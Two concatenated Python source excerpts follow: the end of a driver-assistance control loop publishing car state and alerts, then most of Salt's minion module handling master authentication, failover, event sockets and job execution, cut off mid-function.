recent_blinker \ and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED meta = self.sm['model'].meta if len(meta.desirePrediction) and ldw_allowed: l_lane_change_prob = meta.desirePrediction[Desire.laneChangeLeft - 1] r_lane_change_prob = meta.desirePrediction[Desire.laneChangeRight - 1] CAMERA_OFFSET = self.op_params.get('camera_offset') l_lane_close = left_lane_visible and (self.sm['pathPlan'].lPoly[3] < (1.08 - CAMERA_OFFSET)) r_lane_close = right_lane_visible and (self.sm['pathPlan'].rPoly[3] > -(1.08 + CAMERA_OFFSET)) CC.hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close) CC.hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close) if CC.hudControl.rightLaneDepart or CC.hudControl.leftLaneDepart: self.events.add(EventName.ldw) alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric]) self.AM.add_many(self.sm.frame, alerts, self.enabled) self.last_model_long = self.sm_smiskol['modelLongButton'].enabled self.AM.process_alerts(self.sm.frame) CC.hudControl.visualAlert = self.AM.visual_alert if not self.read_only: # send car controls over can can_sends = self.CI.apply(CC) self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid)) force_decel = (self.sm['dMonitoringState'].awarenessStatus < 0.) or \ (self.state == State.softDisabling) steer_angle_rad = (CS.steeringAngle - self.sm['pathPlan'].angleOffset) * CV.DEG_TO_RAD # controlsState dat = messaging.new_message('controlsState') dat.valid = CS.canValid controlsState = dat.controlsState controlsState.alertText1 = self.AM.alert_text_1 controlsState.alertText2 = self.AM.alert_text_2 controlsState.alertSize = self.AM.alert_size controlsState.alertStatus = self.AM.alert_status controlsState.alertBlinkingRate = self.AM.alert_rate controlsState.alertType = self.AM.alert_type controlsState.alertSound = self.AM.audible_alert controlsState.driverMonitoringOn = self.sm['dMonitoringState'].faceDetected controlsState.canMonoTimes = list(CS.canMonoTimes) controlsState.planMonoTime = self.sm.logMonoTime['plan'] controlsState.pathPlanMonoTime = self.sm.logMonoTime['pathPlan'] controlsState.enabled = self.enabled controlsState.active = self.active controlsState.vEgo = CS.vEgo controlsState.vEgoRaw = CS.vEgoRaw controlsState.angleSteers = CS.steeringAngle controlsState.curvature = self.VM.calc_curvature(steer_angle_rad, CS.vEgo) controlsState.steerOverride = CS.steeringPressed controlsState.state = self.state controlsState.engageable = not self.events.any(ET.NO_ENTRY) controlsState.longControlState = self.LoC.long_control_state controlsState.vPid = float(self.LoC.v_pid) controlsState.vCruise = float(self.v_cruise_kph) controlsState.upAccelCmd = float(self.LoC.pid.p) controlsState.uiAccelCmd = float(self.LoC.pid.id) controlsState.ufAccelCmd = float(self.LoC.pid.f) controlsState.angleSteersDes = float(self.LaC.angle_steers_des) controlsState.vTargetLead = float(v_acc) controlsState.aTarget = float(a_acc) controlsState.jerkFactor = float(self.sm['plan'].jerkFactor) controlsState.gpsPlannerActive = self.sm['plan'].gpsPlannerActive controlsState.vCurvature = self.sm['plan'].vCurvature controlsState.decelForModel = self.sm['plan'].longitudinalPlanSource == LongitudinalPlanSource.model controlsState.cumLagMs = -self.rk.remaining * 1000. controlsState.startMonoTime = int(start_time * 1e9) controlsState.mapValid = self.sm['plan'].mapValid controlsState.forceDecel = bool(force_decel) controlsState.canErrorCounter = self.can_error_counter if self.CP.lateralTuning.which() == 'pid': controlsState.lateralControlState.pidState = lac_log elif self.CP.lateralTuning.which() == 'lqr': controlsState.lateralControlState.lqrState = lac_log elif self.CP.lateralTuning.which() == 'indi': controlsState.lateralControlState.indiState = lac_log self.pm.send('controlsState', dat) # carState car_events = self.events.to_msg() cs_send = messaging.new_message('carState') cs_send.valid = CS.canValid cs_send.carState = CS cs_send.carState.events = car_events self.pm.send('carState', cs_send) # carEvents - logged every second or on change if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev): ce_send = messaging.new_message('carEvents', len(self.events)) ce_send.carEvents = car_events self.pm.send('carEvents', ce_send) self.events_prev = self.events.names.copy() # carParams - logged every 50 seconds (> 1 per segment) if (self.sm.frame % int(50. / DT_CTRL) == 0): cp_send = messaging.new_message('carParams') cp_send.carParams = self.CP self.pm.send('carParams', cp_send) # carControl cc_send = messaging.new_message('carControl') cc_send.valid = CS.canValid cc_send.carControl = CC self.pm.send('carControl', cc_send) # copy CarControl to pass to CarInterface on the next iteration self.CC = CC def step(self): start_time = sec_since_boot() self.prof.checkpoint("Ratekeeper", ignore=True) # Sample data from sockets and get a carState CS = self.data_sample() self.prof.checkpoint("Sample") self.update_events(CS) if not self.read_only: # Update control state self.state_transition(CS) self.prof.checkpoint("State transition") # Compute actuators (runs PID loops and lateral MPC) actuators, v_acc, a_acc, lac_log = self.state_control(CS) self.prof.checkpoint("State Control") # Publish data self.publish_logs(CS, start_time, actuators, v_acc, a_acc, lac_log) self.prof.checkpoint("Sent") def controlsd_thread(self): while True: self.step() self.rk.monitor_time() self.prof.display() def main(sm=None, pm=None, logcan=None): controls = Controls(sm, pm, logcan) controls.controlsd_thread() if __name__ == "__main__": main()
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import from __future__ import print_function import copy import errno import fnmatch import hashlib import logging import multiprocessing import os import re import salt import signal import sys import threading import time import traceback import types from random import randint, shuffle from salt.ext.six.moves import range # Import third party libs try: import zmq HAS_ZMQ = True except ImportError: # Running in local, zmq not needed HAS_ZMQ = False HAS_RANGE = False try: import seco.range HAS_RANGE = True except ImportError: pass HAS_PSUTIL = False try: import psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass # Import salt libs from salt.exceptions import ( AuthenticationError, CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit, SaltSyndicMasterError ) import salt.client import salt.crypt import salt.loader import salt.payload import salt.utils import salt.utils.jid import salt.utils.args import salt.utils.event import salt.utils.minion import salt.utils.schedule import salt.utils.zeromq import salt.defaults.exitcodes from salt.defaults import DEFAULT_TARGET_DELIM from salt.ext.six import string_types from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify import salt.syspaths log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. Handle publications def resolve_dns(opts): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False if check_dns is True: # Because I import salt.log below I need to re-import salt.utils here import salt.utils try: ret['master_ip'] = \ salt.utils.dns_check(opts['master'], True, opts['ipv6']) except SaltClientError: if opts['retry_dns']: while True: import salt.log msg = ('Master hostname: \'{0}\' not found. Retrying in {1} ' 'seconds').format(opts['master'], opts['retry_dns']) if salt.log.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.dns_check( opts['master'], True, opts['ipv6'] ) break except SaltClientError: pass else: ret['master_ip'] = '127.0.0.1' except SaltSystemExit: err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format( opts.get('master', 'Unknown')) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'], ret['master_ip']) ) ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'], port=opts['master_port']) return ret def get_proc_dir(cachedir): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. ''' fn_ = os.path.join(cachedir, 'proc') if not os.path.isdir(fn_): # proc_dir is not present, create it os.makedirs(fn_) return fn_ def parse_args_and_kwargs(func, args, data=None): ''' Wrap load_args_and_kwargs ''' salt.utils.warn_until( 'Boron', 'salt.minion.parse_args_and_kwargs() has been renamed to ' 'salt.minion.load_args_and_kwargs(). Please change this function call ' 'before the Boron release of Salt.' ) return load_args_and_kwargs(func, args, data=data) def load_args_and_kwargs(func, args, data=None): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. ''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, string_types): string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632 if string_arg: # Don't append the version that was just derived from parse_cli # above, that would result in a 2nd call to # salt.utils.cli.yamlify_arg(), which could mangle the input. _args.append(arg) elif string_kwarg: salt.utils.warn_until( 'Boron', 'The list of function args and kwargs should be parsed ' 'by salt.utils.args.parse_input() before calling ' 'salt.minion.load_args_and_kwargs().' ) if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}'.format(arg)) continue # if the arg is a dict with __kwarg__ == True, then its a kwarg elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: for key, val in arg.items(): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}'.format(arg)) continue else: _args.append(arg) if invalid_kwargs: raise SaltInvocationError( 'The following keyword arguments are not valid: {0}' .format(', '.join(invalid_kwargs)) ) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in data.items(): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs class SMinion(object): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module opts['grains'] = salt.loader.grains(opts) self.opts = opts # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): if isinstance(self.opts['master'], list): masters = self.opts['master'] if self.opts['random_master'] is True: shuffle(masters) for master in masters: self.opts['master'] = master self.opts.update(resolve_dns(opts)) try: self.gen_modules() break except SaltClientError: log.warning(('Attempted to authenticate with master ' '{0} and failed'.format(master))) continue else: if self.opts['random_master'] is True: log.warning('random_master is True but there is only one master specified. Ignoring.') self.opts.update(resolve_dns(opts)) self.gen_modules(initial_load=True) else: self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], ).compile_pillar() self.functions = salt.loader.minion_mods(self.opts, include_errors=True) self.function_errors = self.functions['_errors'] self.functions.pop('_errors') # Keep the funcs clean self.returners = salt.loader.returners(self.opts, self.functions) self.states = salt.loader.states(self.opts, self.functions) self.rend = salt.loader.render(self.opts, self.functions) self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MinionBase(object): def __init__(self, opts): self.opts = opts def _init_context_and_poller(self): self.context = zmq.Context() self.poller = zmq.Poller() def _prepare_minion_event_system(self): # Prepare the minion event system # # Start with the publish socket self._init_context_and_poller() hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5')) # Only use the first 10 chars to keep longer hashes from exceeding the # max socket path length. id_hash = hash_type(self.opts['id']).hexdigest()[:10] epub_sock_path = os.path.join( self.opts['sock_dir'], 'minion_event_{0}_pub.ipc'.format(id_hash) ) if os.path.exists(epub_sock_path): os.unlink(epub_sock_path) epull_sock_path = os.path.join( self.opts['sock_dir'], 'minion_event_{0}_pull.ipc'.format(id_hash) ) if os.path.exists(epull_sock_path): os.unlink(epull_sock_path) self.epub_sock = self.context.socket(zmq.PUB) if self.opts.get('ipc_mode', '') == 'tcp': epub_uri = 'tcp://127.0.0.1:{0}'.format( self.opts['tcp_pub_port'] ) epull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts['tcp_pull_port'] ) else: epub_uri = 'ipc://{0}'.format(epub_sock_path) salt.utils.zeromq.check_ipc_path_max_len(epub_uri) epull_uri = 'ipc://{0}'.format(epull_sock_path) salt.utils.zeromq.check_ipc_path_max_len(epull_uri) log.debug( '{0} PUB socket URI: {1}'.format( self.__class__.__name__, epub_uri ) ) log.debug( '{0} PULL socket URI: {1}'.format( self.__class__.__name__, epull_uri ) ) # Check to make sure the sock_dir is available, create if not default_minion_sock_dir = os.path.join( salt.syspaths.SOCK_DIR, 'minion' ) minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir) if not os.path.isdir(minion_sock_dir): # Let's try to create the directory defined on the configuration # file try: os.makedirs(minion_sock_dir, 0o755) except OSError as exc: log.error('Could not create SOCK_DIR: {0}'.format(exc)) # Let's not fail yet and try using the default path if minion_sock_dir == default_minion_sock_dir: # We're already trying the default system path, stop now! raise if not os.path.isdir(default_minion_sock_dir): try: os.makedirs(default_minion_sock_dir, 0o755) except OSError as exc: log.error('Could not create SOCK_DIR: {0}'.format(exc)) # Let's stop at this stage raise # Create the pull socket self.epull_sock = self.context.socket(zmq.PULL) # Securely bind the event sockets if self.opts.get('ipc_mode', '') != 'tcp': old_umask = os.umask(0o177) try: log.info('Starting pub socket on {0}'.format(epub_uri)) self.epub_sock.bind(epub_uri) log.info('Starting pull socket on {0}'.format(epull_uri)) self.epull_sock.bind(epull_uri) finally: if self.opts.get('ipc_mode', '') != 'tcp': os.umask(old_umask) @staticmethod def process_schedule(minion, loop_interval): try: minion.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' ) except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) return loop_interval class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. ''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None): self.opts = salt.config.minion_config(opts['conf_file']) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.functions = salt.loader.minion_mods( self.opts, whitelist=self.whitelist, initial_load=initial_load) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MultiMinion(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. ''' # timeout for one of the minions to auth with a master MINION_CONNECT_TIMEOUT = 5 def __init__(self, opts): super(MultiMinion, self).__init__(opts) def minions(self): ''' Return a dict of minion generators bound to the tune_in method dict of master -> minion_mapping, the mapping contains: opts: options used to create the minion last: last auth attempt time auth_wait: time to wait for next auth attempt minion: minion object generator: generator function (non-blocking tune_in) ''' if not isinstance(self.opts['master'], list): log.error( 'Attempting to start a multimaster system with one master') sys.exit(salt.defaults.exitcodes.EX_GENERIC) ret = {} for master in set(self.opts['master']): s_opts = copy.copy(self.opts) s_opts['master'] = master s_opts['multimaster'] = True ret[master] = {'opts': s_opts, 'last': time.time(), 'auth_wait': s_opts['acceptance_wait_time']} try: minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False) ret[master]['minion'] = minion ret[master]['generator'] = minion.tune_in_no_block() except SaltClientError as exc: log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master)) return ret # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' self._prepare_minion_event_system() self.poller.register(self.epull_sock, zmq.POLLIN) # Prepare the minion generators minions = self.minions() loop_interval = int(self.opts['loop_interval']) auth_wait = self.opts['acceptance_wait_time'] max_wait = self.opts['acceptance_wait_time_max'] while True: package = None for minion in minions.values(): if isinstance(minion, dict): minion = minion['minion'] if not hasattr(minion, 'schedule'): continue loop_interval = self.process_schedule(minion, loop_interval) socks = dict(self.poller.poll(1)) if socks.get(self.epull_sock) == zmq.POLLIN: try: package = self.epull_sock.recv(zmq.NOBLOCK) except Exception: pass masters = list(minions.keys()) shuffle(masters) # Do stuff per minion that we have for master in masters: minion = minions[master] # if we haven't connected yet, lets attempt some more. # make sure to keep separate auth_wait times, since these # are separate masters if 'generator' not in minion: if time.time() - minion['auth_wait'] > minion['last']: minion['last'] = time.time() if minion['auth_wait'] < max_wait: minion['auth_wait'] += auth_wait try: t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False) minions[master]['minion'] = t_minion minions[master]['generator'] = t_minion.tune_in_no_block() minions[master]['auth_wait'] = self.opts['acceptance_wait_time'] except SaltClientError: log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master)) continue else: continue # run scheduled jobs if you have them loop_interval = self.process_schedule(minion['minion'], loop_interval) # if you have an event to handle, do it on a single minion # (first one to not throw an exception) if package: # If we need to expand this, we may want to consider a specific header # or another approach entirely. if package.startswith('_minion_mine'): for multi_minion in minions: try: minions[master]['minion'].handle_event(package) except Exception: pass else: try: minion['minion'].handle_event(package) package = None self.epub_sock.send(package) except Exception: pass # have the Minion class run anything it has to run next(minion['generator']) class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231 ''' Pass in the options dict ''' self._running = None # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup the of the opts grains, so we can log from the grains # module opts['grains'] = salt.loader.grains(opts) # evaluate the master to connect to and authenticate with it opts['master'] = self.eval_master(opts, timeout, safe) self.functions, self.returners, self.function_errors = self._load_modules() self.opts['pillar'] = salt.pillar.get_pillar( opts, opts['grains'], opts['id'], opts['environment'], funcs=self.functions ).compile_pillar() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.proc_dir = get_proc_dir(opts['cachedir']) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) # add default scheduling jobs to the minions scheduler if 'mine.update' in self.functions: log.info('Added mine.update to scheduler') self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': opts['mine_interval'], 'jid_include': True, 'maxrunning': 2 } }) # add master_alive job if enabled if self.opts['master_alive_interval'] > 0: self.schedule.add_job({ '__master_alive': { 'function': 'status.master', 'seconds': opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } }) self.grains_cache = self.opts['grains'] # store your hexid to subscribe to zmq, hash since zmq filters are prefix # matches this way we can avoid collisions self.hexid = hashlib.sha1(self.opts['id']).hexdigest() if 'proxy' in self.opts['pillar']: log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'], self.opts['pillar']['proxy'])) for p in self.opts['pillar']['proxy']: log.debug('Starting {0} proxy.'.format(p)) pid = os.fork() if pid > 0: continue else: proxyminion = salt.ProxyMinion() proxyminion.start(self.opts['pillar']['proxy'][p]) self.clean_die(signal.SIGTERM, None) else: log.debug('I am {0} and I am not supposed to start any proxies. ' '(Likely not a problem)'.format(self.opts['id'])) # __init__() from MinionBase is called in Minion.eval_master() def eval_master(self, opts, timeout=60, safe=True, failed=False): ''' Evaluates and returns the current master address. In standard mode, just calls authenticate() with the given master address. With master_type=func evaluates the current master address from the given module and then calls authenticate(). With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to connect is used to authenticate() and then returned. If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # check if master_type was altered from its default if opts['master_type'] != 'str': # check for a valid keyword if opts['master_type'] == 'func': # split module and function and try loading the module mod, fun = opts['master'].split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise TypeError # we take whatever the module returns as master address opts['master'] = master_mod[mod + '.' + fun]() except TypeError: msg = ('Failed to evaluate master address from ' 'module \'{0}\''.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: {0}'.format(master_mod)) # if failover is set, master has to be of type list elif opts['master_type'] == 'failover': if isinstance(opts['master'], list): log.info('Got list of available master addresses:' ' {0}'.format(opts['master'])) if opts['master_shuffle']: shuffle(opts['master']) elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master'])) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: log.info('Removing possibly failed master {0} from list of' ' masters'.format(opts['master'])) # create new list of master with the possibly failed one removed opts['master'] = [x for x in opts['master_list'] if opts['master'] != x] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False # shuffle the masters and then loop through them local_masters = copy.copy(opts['master']) for master in local_masters: opts['master'] = master opts.update(resolve_dns(opts)) super(Minion, self).__init__(opts) # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in self.opts: self.opts['master_list'] = local_masters try: if self.authenticate(timeout, safe) != 'full': conn = True break except SaltClientError: msg = ('Master {0} could not be reached, trying ' 'next master (if any)'.format(opts['master'])) log.info(msg) continue if not conn: self.connected = False msg = ('No master could be reached or all masters denied ' 'the minions connection attempt.') log.error(msg) else: self.connected = True return opts['master'] # single master sign in else: opts.update(resolve_dns(opts)) super(Minion, self).__init__(opts) if self.authenticate(timeout, safe) == 'full': self.connected = False msg = ('master {0} rejected the minions connection because too ' 'many minions are already connected.'.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) else: self.connected = True return opts['master'] def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' mod_opts = {} for key, val in self.opts.items(): if key == 'logger': continue mod_opts[key] = val return mod_opts def _load_modules(self, force_refresh=False): ''' Return the functions and the returners loaded up from the loader module ''' # if this is a *nix system AND modules_max_memory is set, lets enforce # a memory limit on module imports # this feature ONLY works on *nix like OSs (resource module doesn't work on windows) modules_max_memory = False if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE: log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory'])) modules_max_memory = True old_mem_limit = resource.getrlimit(resource.RLIMIT_AS) rss, vms = psutil.Process(os.getpid()).get_memory_info() mem_limit = rss + vms + self.opts['modules_max_memory'] resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) elif self.opts.get('modules_max_memory', -1) > 0: if not HAS_PSUTIL: log.error('Unable to enforce modules_max_memory because psutil is missing') if not HAS_RESOURCE: log.error('Unable to enforce modules_max_memory because resource is missing') self.opts['grains'] = salt.loader.grains(self.opts, force_refresh) if self.opts.get('multimaster', False): s_opts = copy.copy(self.opts) functions = salt.loader.minion_mods(s_opts) else: functions = salt.loader.minion_mods(self.opts) returners = salt.loader.returners(self.opts, functions) errors = {} if '_errors' in functions: errors = functions['_errors'] functions.pop('_errors') # we're done, reset the limits! if modules_max_memory is True: resource.setrlimit(resource.RLIMIT_AS, old_mem_limit) return functions, returners, errors def _fire_master(self, data=None, tag=None, events=None, pretag=None): ''' Fire an event on the master, or drop message if unable to send. ''' load = {'id': self.opts['id'], 'cmd': '_minion_event', 'pretag': pretag, 'tok': self.tok} if events: load['events'] = events elif data and tag: load['data'] = data load['tag'] = tag elif not data and tag: load['data'] = {} load['tag'] = tag else: return channel = salt.transport.Channel.factory(self.opts) try: result = channel.send(load) except Exception: log.info("fire_master failed: {0}".format(traceback.format_exc())) def _handle_payload(self, payload): ''' Takes a payload from the master publisher and does whatever the master wants done. ''' {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[payload['enc']](payload['load'], payload['sig'] if 'sig' in payload else None) def _handle_aes(self, load, sig=None): ''' Takes the AES encrypted load, checks the signature if pub signatures are turned on, decrypts it, and runs the encapsulated instructions ''' # Verify that the signature is valid master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub') if sig and self.functions['config.get']('sign_pub_messages'): if not salt.crypt.verify_signature(master_pubkey_path, load, sig): raise AuthenticationError('Message signature failed to validate.') try: data = self.crypticle.loads(load) except AuthenticationError: # decryption of the payload failed, try to re-auth but wait # random seconds if set in config with random_reauth_delay if 'random_reauth_delay' in self.opts: reauth_delay = randint(0, float(self.opts['random_reauth_delay'])) # This mitigates the issue wherein a long-running job might not return # on a master key rotation. However, new commands issued during the re-auth # splay period will still fail to return. if not salt.utils.minion.running(self.opts): log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay)) time.sleep(reauth_delay) else: log.warning('Ignoring re-auth delay because jobs are running') self.authenticate() data = self.crypticle.loads(load) # Verify that the publication is valid if 'tgt' not in data or 'jid' not in data or 'fun' not in data \ or 'arg' not in data: return # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. if 'tgt_type' in data: match_func = getattr(self.matcher, '{0}_match'.format(data['tgt_type']), None) if match_func is None: return if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(data['tgt'], delimiter=delimiter): return elif not match_func(data['tgt']): return else: if not self.matcher.glob_match(data['tgt']): return # If the minion does not have the function, don't execute, # this prevents minions that could not load a minion module # from returning a predictable exception #if data['fun'] not in self.functions: # return if 'user' in data: log.info( 'User {0[user]} Executing command {0[fun]} with jid ' '{0[jid]}'.format(data) ) else: log.info( 'Executing command {0[fun]} with jid {0[jid]}'.format(data) ) log.debug('Command details {0}'.format(data)) self._handle_decoded_payload(data) def _handle_pub(self, load): ''' Handle public key payloads ''' pass def _handle_clear(self, load): ''' Handle un-encrypted transmissions ''' pass def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' if isinstance(data['fun'], string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): target = Minion._thread_multi_return else: target = Minion._thread_return # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. instance = self # If we are running in multi-master mode, re-inject opts into module funcs if instance.opts.get('multimaster', False): for func in instance.functions: sys.modules[instance.functions[func].__module__].__opts__ = self.opts if self.opts['multiprocessing']: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None process = multiprocessing.Process( target=target, args=(instance, self.opts, data) ) else: process = threading.Thread( target=target, args=(instance, self.opts, data), name=data['jid'] ) process.start() if not sys.platform.startswith('win'): process.join() @classmethod def _thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if not minion_instance: minion_instance = cls(opts) fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing']: salt.utils.daemonize_if(opts) salt.utils.appendproctitle(data['jid']) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID {0}'.format(sdata['pid'])) with salt.utils.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] if function_name in minion_instance.functions: try: func = minion_instance.functions[data['fun']] args, kwargs = load_args_and_kwargs( func, data['arg'], data) sys.modules[func.__module__].__context__['retcode'] = 0 return_data = func(*args, **kwargs) if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data ret['retcode'] = sys.modules[func.__module__].__context__.get( 'retcode', 0 ) ret['success'] = True except CommandNotFoundError as exc: msg = 'Command required for {0!r} not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' except CommandExecutionError as exc: log.error( 'A command in {0!r} had a problem: 